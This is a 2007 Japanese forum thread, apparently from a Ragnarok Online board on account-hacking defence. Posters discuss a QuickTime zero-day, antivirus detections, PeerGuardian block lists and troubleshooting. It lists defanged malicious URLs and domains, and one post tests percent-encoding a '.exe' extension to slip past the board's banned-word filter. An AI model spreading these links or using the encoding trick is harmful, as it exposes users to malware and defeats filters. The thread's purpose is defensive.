QuickTimeのゼロデイ悪用でSecond Life通貨を強奪
ttp://www.itmedia.co.jp/enterprise/articles/0712/05/news009.html
まだパッチが出て無い上、当然ながらiTunesも影響を受ける。
リモートから任意のコードを実行できるタイプなので、MMO等限定の垢ハクと違い
被害はもっと大きくなる。
セカンドライフだからROとは関係ない、とかいうレベルの話じゃないのでご注意を。 <>
(○口○*)さん<>sage<>07/12/05 21:13 ID:oWDKzPeG0<> >>791
記事タイトルは「されるかもしれない」と追記したほうがいいなぁ。
昨日の日経は「Second Lifeでリンデンドルが盗難の恐れ--ハッカーが指摘」
ttp://itpro.nikkeibp.co.jp/article/MAG/20071204/288631/
あとあっちで書いたけどRealPlayer11Betaの脆弱性は
中華トロイサイトで既に実装されている。
正式版でコンパクトモードが無くなったからと言って
更新していない人は注意。 <>
782<>sage<>07/12/05 23:07 ID:EAa7oNU20<> >>783
>張られたアドレスは>777と同じだったのかな?
ご丁寧に、setup■exeまでついてました。
再取得するのを忘れて、削除済みの可能性も忘れてました。失敬。 <>
(○口○*)さん<>sage<>07/12/05 23:22 ID:Vr9WfkmJ0<> >>791
それ被害者が出たわけじゃなくて
被害が出ることが実証されたっていう記事なんじゃ? <>
(○口○*)さん<>sage<>07/12/06 00:27 ID:i0HpSgJO0<> >786
ばっちり対応してるな
Kaspersky 7.0.0.125 2007.12.05 Trojan.Win32.Inject.mu
ただeSafe以外はVirus.Orgでも全部スルー
流石と言うべきか <>
(○口○*)さん<>sage<>07/12/06 09:30 ID:Dai+xXX60<> >>777
Avira Antivirでも対応を確認。検出名はTR/Inject.MU
このソフト、ちょっとマイナー(ゆえに回避対象となりにくい)でしかも対応が
他のフリー系ソフトの中でも早めなので案外お勧めだったりする。
>>791
こういう誤認させるような記事って記者の故意なのか、それとも日本語能力の欠如なのか…。
なんにせよ素養を疑っちまうよなぁ。まぁ、ジャーナリズムやマスコミ相手は先ず疑って掛かる
事を基本とすべしと思っているんで、記事自体はどーでもいいが。 <>
(○口○*)さん<>sage<>07/12/06 11:05 ID:QWIyr58j0<> セキュWiki更新しようと思ったら、下記のエラー
Parse error: syntax error, unexpected ',' in /usr/home/hunter/pukiwiki-1.4.7/spam.ini.php on line 5075
更新しようと思った箇所は、検体提出先のRising Antivirus
中国語のフォームしか記載してなかったので、英文のフォーム(下記)を追加しようとしたらこけた
http://sample.rising-global.com/webmail/upload_en.htm <>
(○口○*)さん<>sage<>07/12/06 14:19 ID:QWIyr58j0<> 検体提出先修正箇所追加
Aladdin(eSafe) <esafe@aladdin.co.jp> -> <virus@aladdin.co.jp>
-----
eSafeからのメールによると、次からはこっちに送ってくれとのこと。
|Thank you for your information regarding unknown viruses.
|Please try to send the suspicious files to virus@aladdin.co.jp at next time.
|
|Thank you.
|
|Sincerely yours,
|eSafe customer support <>
(○口○*)さん<>sage<>07/12/07 00:48 ID:QO6pEDgl0<> 総合スレより移動
88 (^ー^*)ノ〜さん sage 07/12/06 22:50 ID:K5ThLcHQ0
・・・「■exe」が禁止ワードっぽい。投稿しにくいったらないな。
89 (^ー^*)ノ〜さん sage New! 07/12/07 00:32 ID:2Zm2pl6R0
でも■exeが使用可能だった場合を考えるとさらに被害甚大だっただろうからしかたあんめえ
90 (^ー^*)ノ〜さん sage New! 07/12/07 00:34 ID:LxJp4SOU0
そもそも実行ファイルへのリンクなんて普通は不用だしな
setup■exeとか、Ragnarok■exeとか、説明する時にも使うと思うんだけどな。 <>
(○口○*)さん<>sage<>07/12/07 03:37 ID:PrNxCjWd0<> >>799
だが、アカウントハック対策として「■exe」や「■scr」を禁止ワードに設定するのは基本でしょ
管理する側からすれば当然のことだと思うけど。
多少不便だろうけど、この条件の中で説明するなりして合わせるしかないでしょ。
こんな状況で「■exe」を禁止ワードから外すわけにはいかないだろうからね。 <>
(○口○*)さん<>sage<>07/12/07 04:43 ID:XXyRGQfR0<> あっちのスレ見てて思ったけど、
しかくえぐぜ を禁止ワードにしてどうするんだ、そもそも禁止なのになんで書き込めてるんだ
と考えてた俺はかなりのアホでした <>
(○口○*)さん<>sage<>07/12/07 14:16 ID:QO6pEDgl0<> >>800
拡張子も含めたファイル名で説明するのって、エラースレとか、初心者質問スレとかだし
投稿できたように見えて失敗してるというパターンだから、エディタで書いてコピペとか
専ブラで直前の復帰とかできない場合、すっごく萎えるんだよね。説明って疲れるし。
知らずに投稿失敗すると泣けるってだけなんですが。
>>801
投稿した後、そういう勘違いされそうだなって思ったのは内緒だ。なんかちょっと嬉しい。 <>
800<>sage<>07/12/07 15:51 ID:PrNxCjWd0<> >>802
>知らずに投稿失敗すると泣けるってだけなんですが。
そうか、それはすまない
>・・・「■exe」が禁止ワードっぽい。投稿しにくいったらないな。
>setup■exeとか、Ragnarok■exeとか、説明する時にも使うと思うんだけどな。
この辺が運営に対する不満のようにとれたので、利用者側で合わせるしかないでしょというようなことを書いたんだ。
「「■exe」の禁止ワードに引っかかって何度も投稿失敗したよorz」くらいに書いてくれればよかったかもね。
まぁ、ここに限らず禁止ワードにしているところは多いから、長めの文章を書く時には投稿失敗で泣かないためにも、
エディタで下書きしておいてまとめてコピペ、投稿できたことを確認するまではエディタの方は閉じずに残しておくのがいいのかな。
投稿前に「.」を検索してみて必要に応じて置換とか出来るしね。 <>
(○口○*)さん<>sage<>07/12/07 16:41 ID:Q8VJmnpu0<> テスト example.com/example%65%78%65 <>
(○口○*)さん<>sage<>07/12/07 16:42 ID:Q8VJmnpu0<> ピリオド忘れた
example.com/example.%65%78%65
example.com/example%2e%65%78%65 <>
(○口○*)さん<>sage<>07/12/07 22:35 ID:dCISNOwN0<> ハクスレ>100
盗まれたタイミングによる。
課金切れの時に踏んだら、中華にしろ盗みようが無い。
しかしキーロガーじゃなく、PCを完全にコントロール出来るタイプだと
HDD内部のデータは全部持って行かれる可能性がある。
PASSやらをメモで残してたら、さっくりハクられる可能性がある。
チケ切れの間に1Day使われて盗まれた人も過去には居たようだし
課金切れだから踏んでも被害に遭わない、とは言えない。 <>
(○口○*)さん<>sage<>07/12/07 22:51 ID:7PePqYPkO<> ワンデイ使う中華もいるのか。
まじうんこだな〜 <>
(○口○*)さん<>sage<>07/12/07 23:23 ID:VfUZFvFh0<> カムバックキャンペーンなんてのもあるしチケ切れだからといって全然安全じゃないな <>
(○口○*)さん<>sage<>07/12/07 23:43 ID:Uosjili+0<> >>806
以前に、本当かどうか不明だけど勝手にチケットを使われて取られたって人が居た
高級装備があるって確信があったんだろうな <>
(○口○*)さん<>sage<>07/12/07 23:47 ID:Uosjili+0<> ってよく見たら同じこと書いてたー <>
(○口○*)さん<>sage<>07/12/08 01:38 ID:ry8FdsfB0<> ちょっとPeerGuardan2について質問させてください。
先週末にPG2を導入して、リネ資料室さんのとこのリスト(Linegeトロイ、中国・韓国・台湾)と
RO垢ハクまとめサイトさんとこの8/22までの分のドメインリストと
その後の分のまとめサイトさんとこの12/7分までのリストを更新しつつブロックにしてあります。
その状態で一週間ほど使っていたのですが、ブロック履歴のところに78xian■comという
アドレスからほぼ毎日のようにアクセスがあるんですが(ブロックはして居るようですが)、
コレはうちのPCが上記PG2の導入を行う前にトロイなりに感染していて、PG2を導入、リスト入力したために
先週以降からのアクセスをブロックしている、と考えてよろしいのでしょうか?
仮にその状況であった場合、これからどういった対処をすべきなのでしょうか
とりあえず癌ID、アトラクIDおよびキャラパスの変更の必要性があるかどうかご教授願います。
ウィルス対策ソフトはカスペ7.0、本日20時ごろにアップデートして完全スキャンしたところ、特に何も見つからなかったようです。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/08 12:48 ID:hMcYM6AY0<> バスターを入れなおす前に調べ物をしていたらPG2がHTTPブロック。
リストのp5ip■comが反応した模様…。
ttp://pasokoma■jp/bbs3/pslg4747
そして現在カスペオンラインでチェック中。
気をつけようと心がけていても踏んだ予感。中の人涙目。 <>
(○口○*)さん<>sage<>07/12/08 12:51 ID:G3LSFNyS0<> な、なむです…(;´Д`)
まとめ中にうっかりURLを開いてしまったとかでしょうか… <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/08 12:54 ID:hMcYM6AY0<> >>811
毎日アクセスがあるのは危険な気がします。
とりあえず先輩諸氏、811の人のことをよろしくお願いします。
ああ…OS、Meから入れなおしになるのか…。バックアップバックアップ。 <>
(○口○*)さん<>sage<>07/12/08 13:16 ID:nEkezjoD0<> っ TrueImage <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/08 14:47 ID:hMcYM6AY0<> データの選別と検索かけながらテンプレを今更ながらUP。
【 気付いた日時 】 07/12/08 03:05:19
【不審なアドレスのクリックの有無 】有り
【 アドレス 】 ttp://pasokoma■jp/bbs3/pslg4747
【 OS 】 WindowsXp HomeEdition Ver5.1(Build 2600.xpsp_sp2_gdr.070227-2254:ServicePack2)
【使用ブラウザ 】 IE6 Ver6.0.2900.2180.xpsp_sp2_gdr.070227-2254
【WindowsUpdateの有無】 12/06 二日前
【 アンチウイルスソフト 】 ウイルスバスター2008
(最新の更新だが今回のOS起動時にアップデートが出来ない不備に陥って再インスト)
【その他のSecurty対策 】 WindowsDefender(当日直前にアップデートがあった模様) Ad-Aware SE Personal
【 ウイルススキャン結果】 カスペルスキーオンラインスキャン ウイルスバスター2008
フルスキャンで見つからなかった。
【テンプレの参考サイトを読んだか】 Yes
【hosts変更】有 12/07 16時頃
【PeerGuardian2導入】有 (リネージュ研究室Linegeトロイ中国韓国台湾、2とまとめ本家のリスト)
【説明】
XPで使用できるwinipcfgをGoogleで探して上位ページに出てきた上記サイトをクリック。
画面が灰色ページ(paskomaとかいうページはQAサイトっぽい)で背景色のまま文章が出ないと思ったら
HTTPブロックでPG2が反応していたので30秒ほどでエスケープ&バックスペースで撤収。
でもこの時、hostsリストにもあった"p5ip■com"の存在に結びつかなかった。
アップデート不良のVB2008を入れなおして、
暫く経った時にリスト編集していた時にPG2のブロックHTTP名が
アカハックリストだと気がついたけど、その時どの検索項目だったか解らず
IEの一時ファイルのファイル表示で該当時間作成されたと思われるクッキーを発見。
検索項目を思い出しながらさかのぼって該当URLっぽいのを発見。
確認の為、踏む。 その後カスペルスキーとバスターのフルスキャンでウイルスは見つからずの状態。
とりあえず外部HDDにデータをこれからする所。 <>
(○口○*)さん<>sage<>07/12/08 14:58 ID:rJcNL1a50<> Windows Updateが使えなくて困ってます。
数日前に2ちゃんのWindows板でも質問をして、そのときいただいたアドバイスを
試したんですが、残念なことに改善されませんでした。
(セーフモードでUpdate、Windowsファイアーウォールを切る等)
あまりにあちらで何度も聞くのは悪いと思い、こちらにきてみました。
Windows Updateの頁に接続すると、かなりの時間読み込みがあり、
その後表示されるのは真っ白な画面だけなのです。
できなくなってから2-3日経った後に、avastでウイルスを自動検知しました。
現在はカスペルスキーオンラインスキャン、avast共に何も検出されませんが、
avastでは今までは出なかった、検査できないファイル?領域?の表示が出るようになっています。
別のPCで2度アカハックに遭って以来、現在のこのPCではPGも導入して
色々気をつけているのですが、大本のWindows Updateが出来ないと、自衛も何も
無いですよね・・・。
何か心当たりやアドバイスがありましたら、よろしくお願いします。
ちなみに、マイクロソフトのサポートからはまだ返事はきていません。 <>
(○口○*)さん<>sage<>07/12/08 15:22 ID:LAa72KHt0<> >>817
IEのアドオンを全部切ればよろし。
具体的には、ファイルメニューから、ツール→インターネットオプション→詳細設定→
→ブラウズの項目内のサードパーティー製のブラウザ拡張を有効にする
ここをチェック外す。IE閉じてIE再起動。
これで多分いける。アドオンの管理から1つづつ切るより確実。
但し、WindowsUpdate後、設定戻してもアドオン動かなくて、入れなおさないといけないことも。
サイトアドバイザーとかAiroboformとか、グーグルツールバーとかその辺全部切るってことね。 <>
(○口○*)さん<>sage<>07/12/08 15:24 ID:LAa72KHt0<> 別の方法として、SP+メーカーを使って、Fix専用のCDを作ってそっちで更新するという手もある。
但し、SP+メーカーの定義ファイルが更新されないとできないので、WindowsUpdateできるのがちょっと
遅れる欠点もある。 <>
(○口○*)さん<>sage<>07/12/08 15:53 ID:vK49xlnX0<> >811
78xian■comがどういうサイトか判らないけど、外から侵入を試みるのはよくある話。
トロイに感染した結果かもしれないし、単なるTCP Syn FLOOD攻撃かもしれないし。
それだけの情報じゃ、多分誰も判断出来ないと思う。
ただPC→外部の通信でブロックしてたらハクの可能性は高いけど、外→PCだったら
垢ハクとは関係ないと思う。
ID/PASSが盗まれてるなら、外から侵入せずともハクれるわけだし。
もっとも、単にクラックしようとしてきてるだけにせよ無害とは言えないわけだが
気になるならルーター部分でアクセスをブロックするとか、手を打った方がいいかもしれない。
>816
ちょっと状況が判らない。
hostsにp5ip■comを記入してたのなら、PG2で反応しようがないと思うんだが……
それとp5ip■comって今生きてる?
何か死んでる気がするんだけど、調査不足かな…… <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/08 16:46 ID:EKYR3+Bx0<> >>828
報告したアドレスにアクセスした時にPG2でHTTPブロック検出したのがwww■p5ip■comでした。
そのサイトを踏んだときに読み込みが遅く表示がされなかったのと、
hostsリストの結構上のほうで検索で引っかかったので
実際どうなんだろうといった所です。
VB2008の不正変更の監視の項目にある
hostsの変更で"処理を確認する"に設定してあるので
hostsが動作していないって事は無いと思いたいのですが…。 <>
(○口○*)さん<>sage<>07/12/08 17:09 ID:3a4oKFG50<> p5ipは既に見捨てたドメインだと思う。
ドメイン業者の広告になってる。 <>
817<>sage<>07/12/08 17:43 ID:rJcNL1a50<> >>818
817です。アドバイスありがとうございます。
818さんに教えていただいたチェックを外して再起動してみたのですが、まだだめでした。
サイトアドバイザー、Airoboformの二つは導入したことが無く、
グーグルツールバーは、右クリックしても出てこないので、入っていないと思われます。
SP+メーカーをDLしてきて、ISOイメージファイルの作成まではいけたのですが、
DVDROMが無く、まだブートDVDの作成まではできていない状況です。
そこで新たに質問なのですが、もう1台ノートのPCがあるのですが、
そちらではきちんとWindows Updateが適用されているので、こちらを使って
アップデートファイルなどを落としてきて、フラッシュメモリで移動して
インストールすることは可能でしょうか?
マイクロソフトのサイトを見ているのですが、強制的にインストールになってしまうようで、
メモリに落とし込めるようなファイルが見当たらないのです。
何度もすみませんが、どうぞ宜しくお願いいたします。 <>
(○口○*)さん<>sage<>07/12/08 17:53 ID:LAa72KHt0<> >>823
Fix専用なら、CD-Rでも十分入るんだが。
>アップデートファイルなどを落としてきて、フラッシュメモリで移動して
>インストールすることは可能でしょうか?
アップデート用のファイルが全てわかってるならな。SP+メーカーのFix用ディスク作成と
同じ考え方。ISOイメージ作る前のフォルダからフラッシュメモリにコピーしてもいけるが
根本的な解決をやった方がいいぞ。
WindowsUpdateを自動更新にしてもダメなんかね。ブラウザからやらんでも。
Avastで検知した時点で、なにかがOSの一部をぶっ壊している可能性もあるし
環境も晒さないで相談するような奴には「OS入れなおせ。これ以上の質問は受けつけん」と
回答して終わりにしても構わないよな。 <>
(○口○*)さん<>sage<>07/12/08 18:28 ID:GBiP6MGn0<> >817
ROを起動しながらWindows Updateしようとしていない?
うちの環境でもROを起動しながらだとWindows Updateができないんだけど、ROを起動していない状態なら問題なくできるんで。
関係なかったらすんません。 <>
(○口○*)さん<>sage<>07/12/08 18:51 ID:G3LSFNyS0<> 個別パッチ落としたらいいんじゃないかな <>
(○口○*)さん<>sage<>07/12/08 20:06 ID:4civ6Yvt0<> WindowsUpdateが上手く行かない人にはMBSA (Microsoft Baseline Security Analyzer)
ってのもある。
http://www.microsoft.com/japan/technet/security/tools/mbsahome.mspx
使っているPCのMS製品に当てるべきパッチを調べてピックアップしてくれるという物。
パッチDLリンクも出る。試してみても良いかもしんない。 <>
817<>sage<>07/12/08 20:59 ID:rJcNL1a50<> すみません、>>817です。テンプレを埋めました。
そして進展がみられたのですが、どうも腑に落ちない感じなのです。
【 OS 】 Windows XP SP2
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 3日前くらい?
【 アンチウイルスソフト 】avast バージョン4.7.1098 (Vps:071207-0)
【その他のSecurty対策 】 ルーター(Baffalo製品のアタックブロック)
【 ウイルススキャン結果】 avastにて HTML:Small[Trj]を検知し駆除
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】有 ROアカウントハック対策スレのまとめサイトを参照
【サポートへの通知】マイクロソフトサポートにメール済み
【説明】
上記のトロイを検知する前よりも、Windows Updateに支障が出ていました。
avastとPGの更新は、PC立ち上げの時以外にもやっています。
ログ時刻によると、avastでフルスキャンをした5分後に上記のトロイが入ったようです。
以前まで&そしてもう一台のノートPCで、ツールからWindows Updateをする時と比べて
明らかに遅く、読み込みに5分以上かかり(その時開いている他のウインドウの画像が
焼きつくような現象がでます)その後真っ白な画面が表示されます。
ここからが進展なのですが、真っ白の画面を10分以上放置しておいたところ、
Windows Updateの頁が表示されました。
そこで更新チェックをしたところ、新しいものは何も無いという結果が出ました。
自動更新は常に有効にしているのですが、
これはそのおかげで既に更新されてるということになるのでしょうか。 <>
817<>sage<>07/12/08 21:00 ID:rJcNL1a50<> 続きです。
Fix専用という部分が理解できていないようです。すみません。
ISOの容量を見たところ、980MBとなっていました。
ROを立ち上げながらのWindows Updateはしていません。
同時に立ち上がっているのは、他のブラウザと、メッセンジャーになります。
>>827さんの教えてくださったソフトを落として使ってみました。
Security Update Scan Resultsという項目のところで
Score:Check faild(黄色い盾のマーク)
Issue:Windows Security Updates
Result:1 service packs or update rollups are missing.
(1 サービスのパックかアップデートロールアップが欠けています。)
と表示されたのが気になりました。
更新プログラムはありません、と表示される方が正しいのか、
何か欠けているよと表示されるのが正しいのか、分からなくなってしまいました。
現在エキサイト翻訳をかけながら読解しているところです。
ちなみに、さっきは真っ白放置の後表示されたWindows Update頁は
現在は20分以上放置しているのに、真っ白のままで表示されていません。 <>
817<>sage<>07/12/08 21:11 ID:rJcNL1a50<> 更に追記ですみません。
>>827のMBSAのレポート結果で、アップデートしなさい、とリンクが張られていたのですが、
そのリンクがまさにUpdateの頁で、開くと真っ白で表示されないあの頁になっています。 <>
(○口○*)さん<>sage<>07/12/08 23:27 ID:4civ6Yvt0<> Vista使ってないならMBSA 2.0.1の方が良いかな。日本語版があるので。
症状を見ると別PCではWindowsUpdateのページには繋がるのね。じゃ経路問題でも
無し、と。hosts改竄でもなさげ。
やっぱりWindowsがどこかでイカれてしまったんじゃないかなぁ。入れなおしが早いような気がする。
ちなみに、MBSAでリストアップされたパッチへのlinkはドラッグ&ドロップでIrvine等に送れるので
リトライを多め&タイムアウト長めで設定すれば落としてくれるかも。 <>
(○口○*)さん<>sage<>07/12/08 23:29 ID:LAa72KHt0<> >>828
|そこで更新チェックをしたところ、新しいものは何も無いという結果が出ました。
|自動更新は常に有効にしているのですが、
|これはそのおかげで既に更新されてるということになるのでしょうか。
Yes。そのままにしとけ。
|明らかに遅く、読み込みに5分以上かかり(その時開いている他のウインドウの画像が
|焼きつくような現象がでます)その後真っ白な画面が表示されます。
ちょっと気になったんだが、PC環境に問題がありそうだ。
メモリ実装量が少なく、なおかつ、VGAがチップセット内蔵の場合に生じ易い。
512MB位だとなるかもしれん。メモリを増やせば改善する可能性がある。
メモリが十分にある場合には別の原因。
VGAのドライバーを削除し、残ったゴミもツールで奇麗にした後に、入れなおす。
それで直らない場合は知らん。
あとはそうだな、LANを疑え。無線LANなら有線にするとか、ネゴシエーションしないように
速度を低めで固定してみるとかで改善するかも知れん。無線LANのアダプタが半死でも
その症状出るかもな。
>>829
>Fix専用という部分が理解できていないようです。すみません。
作成画面の「高度な設定」ボタンを押す→HotFix専用インストールCDを作成するにチェック。
これで作成されるのがSP適用のみを行なうディスク。 <>
(○口○*)さん<>sage<>07/12/09 04:56 ID:r3ZZwFSv0<> 気付いた日時 12月初頭?
【不審なアドレスのクリックの有無 わからないです。
OS 】 (SP等まで正確に書く) WINDOUS・XPす。SPってなんでしょう?
【使用ブラウザ 】 IEっていうやつでしょうか?
【WindowsUpdateの有無】 たぶん12月初頭?
【 アンチウイルスソフト 】 NortonInternetSecurity2007 です。たぶん。
【 ウイルススキャン結果】 わからないです。ノートン先生とは別の?
【テンプレの参考サイトを読んだか】 読んでないです。
【hosts変更】(有/無 ホストがなにかわからないです。
【PeerGuardian2導入】(有/無 これがなにかもわからないです。
【説明】
アドレスはわからないのですが、「へいわぼけ」というブログ?にいくとアドレスを踏んでも
飛べなかったり、右クリックを押してもなにも開かなくなります。他の窓は正常に動きますが、
新しく窓を開こうとしても同じようになります。CPU?の動きがだんだん悪くなっていきます。
全ての窓を閉じて再起動すれば直りますが、「へいわぼけ」を見るとやはりそうなります。
見なければいい話なのですが、活字中毒なので読みたいです。ROの過去スレッド興味のあるものは
200スレほど読み、一通りブログも読みました。(内容はだいたい忘れました)
どうすれば読めるようになるでしょう?もしくは、なにが悪いのでしょう?このPCは買って
3ヶ月の新品なのでPCは悪くないと思います。アクティブX?だかダイレクトX?とか
いうやつが悪いのでしょうか?もしくはJAVAスクリプト?とかいうやつ?
もしくは、なにかウィルスを踏んでしまったのでしょうか?
たぶん上記の文を見ればわかっていただけると思いますが、ネット暦は7年ですが
セキュリティ?とかPCのシステムについてはさっぱりです。適当にゲームをして
文章系サイトや掲示板を見てきただけなので。一応他の場所から見ることはできますので
見ることに関しては諦めてもいいのですが、PCが壊れてしまうととても不安
なのでそれを相談したいです。安全に読めるなら読みたいです。
ウィルス?にかかっているのかどうか教えてください。また、この症状(右クリック不能・
アドレス飛び無効・再起動すれば直る)がなにを意味するのか教えて欲しいです。
無駄な長文で2レスも使ってしまってすみません。よろしくお願いします。 <>
(○口○*)さん<>sage<>07/12/09 05:05 ID:r3ZZwFSv0<> あ、2レスも使って〜というのは長いので2つにわけなきゃいかないかな〜と思って
書きました。1つに収まりましたね。ROの板なので言ったほうがいいのかわかりませんが
とりあえず言うとROは資産(装備)が2.4M?くらいしかなく、カード装備防具
はアルギオペ・アンバーナイトしかない状態です。なのでアカハックに関してはそんなに
心配ないかもです。武器も属性2本とカード武器1本だけなので。
リアルに関してもクレジットカードなどは使ったことがなく、全て代引きで
支払っていますのでおそらく個人情報以外は流出しても心配ないと思います。
PCが壊れてしまうことだけが心配なのでよろしくお願いします。 <>
(○口○*)さん<>sage<>07/12/09 08:43 ID:8uipnm7Q0<> ググレカス(AAry <>
(○口○*)さん<>sage<>07/12/09 08:55 ID:C31A2/PF0<> 釣りだろ。スルーで。 <>
(○口○*)さん<>sage<>07/12/09 09:26 ID:MODQAvFR0<> いや、馬鹿にするのは簡単だが、ここまで電波ゆんゆんな文章、そうそう書けるもんじゃないぞ。 <>
(○口○*)さん<>sage<>07/12/09 09:31 ID:fy9VHi1X0<> >>833
>>1
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
おk? <>
(○口○*)さん<>sage<>07/12/09 10:57 ID:fy9VHi1X0<> 最近、PG2のログに、www■yohoojp■com が頻繁に出てくるのが
気になっていたのですが原因判明しました。
PG2反応時にnetstatの画面を見るとアクセス先は
TCP ****:2806 www■ro-fenrir■com:http SYN_SENT
RO環境を晒してみるスレテンプレのdxdiag画像があったアドレスが
http://www■ro-fenrir■com/directx_shindan.gif であり、現在は404。
専ブラでこのスレを開く度に反応していた模様。ただのドメイン失効かな。
http://www■ro-fenrir■com -> 8■15■231■108
http://www■yohoojp■com -> 8■15■231■108
検出できない何かが残ってる訳ではなかったようで一安心。 <>
(○口○*)さん<>sage<>07/12/09 12:00 ID:r3ZZwFSv0<> >>835.836.837.838さん すみません。釣りではないのですが、あまりよくない
質問だったようですね。なるべく自分で調べてやってみます。もしかしてこれも
悪い質問なのかもしれませんが、右クリックが効かなくなる症状はどういう原因で
起こるのでしょう?また、こういうとても初心者?みたいな質問はどこですれば
いいのでしょう?そういうスレはないのでしょうか?もしあるならば誘導お願いしたいです。
お手間を掛けますがなるべくよろしくお願いします。 <>
(○口○*)さん<>sage<>07/12/09 12:11 ID:C31A2/PF0<> ttp://kotaete-net.net/
ttp://oshiete.goo.ne.jp/
ttp://okwave.jp/
ttp://pc11.2ch.net/pcqa/ <>
(○口○*)さん<>sage<>07/12/09 12:16 ID:fy9VHi1X0<> >>840
そういう場合は>>835-938と表記した方がいい。
さて、サイトの方はアクセスしましたが問題なさげです。つまり、あなたのPCに問題があるようです。
理由が不明で安定しない症状の場合、対処はPCケース内の埃の掃除とOS入れなおしです。
次善の策としては、グラボのドライバーを消して、残骸も消して、その上で入れなおし。
あと、可能性があるのはメモリのエラーとHDDの不良かな。
根本的にPCのメモリ不足であるの可能性も高いです。
それから、PCの全スキャンはたまにかけとけ。インストールされているノートンで1回。
カスペのオンラインスキャンで1回と複数でかけるように。そのほか、Spybotとかでもかけとけ。
何が潜んでいてもおかしくなさそうだ。
いらないテンポラリの削除やら、IEの入れなおしやらできることはあるわけですが、
報告されている内容を読む限り、無償で回答するには割に合わない手間が掛かりそうです。
PCメーカーや、組んでくれた人に相談しなさい。
ROに関係のあるエラーの場合は下記のスレでも相談を受け付けてます。
但し、今回の件は、持ち込まれても、「PCリカバリorOS入れなおししろ」で終了ですが。
いろんなエラーに悩まされている人の相談室 その23
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1194784095/ <>
(○口○*)さん<>sage<>07/12/09 12:17 ID:siXNFuiY0<> >>840
分からない、知らない、忘れたのほぼノーヒント状態で、
理由も含めて完全解決しろっていうのが、どれだけ非常識か気づいてないのが原因。 <>
(○口○*)さん<>sage<>07/12/09 12:17 ID:fy9VHi1X0<> >>841
危機感を抱かせる貼り方すんなwww
>840の「そういうスレはないのでしょうか?もしあるならば誘導お願いしたいです。」に
対する、回答の質は問わず、解決するとも限らないが、質問しても構わない場所の
アドレスですね。 <>
(○口○*)さん<>sage<>07/12/09 12:19 ID:r3ZZwFSv0<> >>841さん なるほど!教えてグーというところがありましたね!なんどか見たことが
ありました。そこで質問してみます。どうもありがとうございました。 <>
(○口○*)さん<>sage<>07/12/09 12:27 ID:r3ZZwFSv0<> >>843さん 確かにその通りですね。特定のサイトに行ったときのみ、という部分で
なんとかならないかと思いましたが、842さんによるとサイトには問題がないようですね。
つまりウィルスとかを踏んでしまったということですかね・・・。ノートPCで
1〜2週間ぐらいの間隔でノートン先生がスキャンをかけていてくれるのですが、カスペ
なんとかも見てみます。いろんなエラー相談室はROのエラーでなくてもよかったのですね。
もう少し調べてみてわかるように報告できたらと思います。
844さんお教えどうもです。もう少しやってみてだめなら何度か見たことのある
教えてグーに行ってみようと思います。どうもありがとうございました。 <>
(○口○*)さん<>sage<>07/12/09 13:48 ID:t8bd/Wf90<> >>821
VB2008で"処理を確認する"に設定してあるのにhostsファイルを
いじくっても何も出てこないのがものすごくアレだな… <>
まとめ臨時<>sage<>07/12/09 15:47 ID:snCHXmYG0<> なんかややこしいなと思い経験を兼ねて
クリーンインストールしてしまいました訳ですが。
めっさ快適になった所でようやく復旧しかけたのに…
Outlookの"res://C:\Program Files\Outlook Express\msoeres■dll/frntpage■htm"のページを実行し続けるとか言う現象が出たので
困ってres〜のURLの部分をぐぐって出てきた検索結果をクリック。
そしたら踏んだttp://winxp■pasokomo■jp/8_220730のページで
またPG2がwww■p5ip■comを拾ったようでHTTPブロックを検出したという…。
>>816の時の報告の状況と、まんま同じ状態に陥ったまぬけです。
しかも何気に検索結果、paskomoページが連荘だった。
なにやってるんだろう俺。
ちなみにツール→オプション→起動時に「受信トレイ」を開くでOutlookのは解決したけどもうあほかと。
で、>>820 >>822 で言われていらっしゃるように残骸なのかなあとか、
前回もカスペのオンラインスキャンで引っかからなかったのと
>>839 の報告を見て思ったわけですが…。
統合っぽいリストが前日からやって出来上がってたのですが
まとめすぎたリストは>839で発掘?したような残骸が
よく引っかかるみたいな状況に陥ることがあるやもしれませんね。
とりあえずスパイラルに陥りすぎたのでもう寝てきます…。
お騒がせして申し訳なく…。
>>847
あいかわらず変更をしても反応してくれないのですが
外部からのアプローチやプログラムによる変更でないと反応しない仕組み?
内部からの手動では反応しないのかなと妄想。
でもVB2007やWindowsDefenderはすぐに反応していただけにさっぱり。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/09 15:49 ID:snCHXmYG0<> ああトリップが…。 <>
817<>sage<>07/12/09 15:54 ID:sQ+g6ff60<> >>831さん、お答えくださった皆さん
親身になって色々なアドバイスを本当にありがとうございました。
とりあえず現状は、自動更新は生きているようですので、仕事の山場が終わり次第
グラフィック系のドライバの入れなおし、改善が見られなければOS入れなおしをしようと思います。
>>832
蛇足かもしれませんが、テンプレで書きそびれた構成などは以下の通りでした。
Core2Quad 6600 2.4GHz メモリ4G(認識3.2Gまでですが) NVIDIA G Force8600GTS <>
(○口○*)さん<>sage<>07/12/09 18:43 ID:mx5Rvdtc0<> カスペさんWEBスキャン。今のバージョン
NOD32の試用版の残骸インストーラーのフォルダをWorm.Win32.Downloader.clだって検出したんだけどw <>
(○口○*)さん<>sage<>07/12/09 18:49 ID:B+PJ/jJR0<> 他のウイルスチェッカーを誤判定するのは良くあること <>
(○口○*)さん<>sage<>07/12/09 20:29 ID:+PjTmHt60<> 皆様にお聞きしたいのですが、ご教授のほう宜しくお願いします
今日、RO関連サイトのリンクを見ようとしてたら
アカハックのURL(トロイ)だったらしくカスペルスキーのアラートが出てきて
「ブロックして拒否する」みたいな選択を選びました
その後、スキャンして「現在、脅威はありません」とは出てきますが
履歴には、
疑わしいHTTPオブジェクト<ttp://mutu■s143■xrea■com///mutu■s143■xrea>:にトロイの木馬「trojan-Clicker■JS■Agent■h」を検知しました
疑わしいHTTPオブジェクト<ttp://mutu■s143■xrea■com///mutu■s143■xrea>:アクセスが拒否されました
